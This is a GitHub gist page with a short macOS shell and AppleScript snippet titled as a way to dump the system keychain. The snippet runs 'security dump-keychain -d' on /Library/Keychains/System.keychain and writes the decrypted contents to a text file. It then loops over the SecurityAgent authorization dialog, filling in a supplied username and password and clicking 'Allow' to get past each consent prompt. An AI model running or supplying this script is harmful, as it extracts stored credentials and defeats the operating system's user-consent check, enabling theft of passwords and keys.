Created
July 26, 2016 12:33
-
-
Save masbog/2f05c4be2bc726e71c22a4a0202ffbce to your computer and use it in GitHub Desktop.
Dump system keychain with automation insert username and password
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$security dump-keychain -d /Library/Keychains/System.keychain > System-keychain.txt & | |
$osascript 2>/dev/null <<EOF | |
set appName to "${username}" | |
set appPass to "${password}" | |
tell application "System Events" | |
repeat while exists (processes where name is "SecurityAgent") | |
tell process "SecurityAgent" | |
if exists (text field 1 of window 1) then | |
set value of text field 1 of window 1 to appName | |
set value of text field 2 of window 1 to appPass | |
end if | |
end tell | |
tell process "SecurityAgent" to click button "Allow" of window 1 | |
delay 0.2 | |
end repeat | |
end tell | |
EOF |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment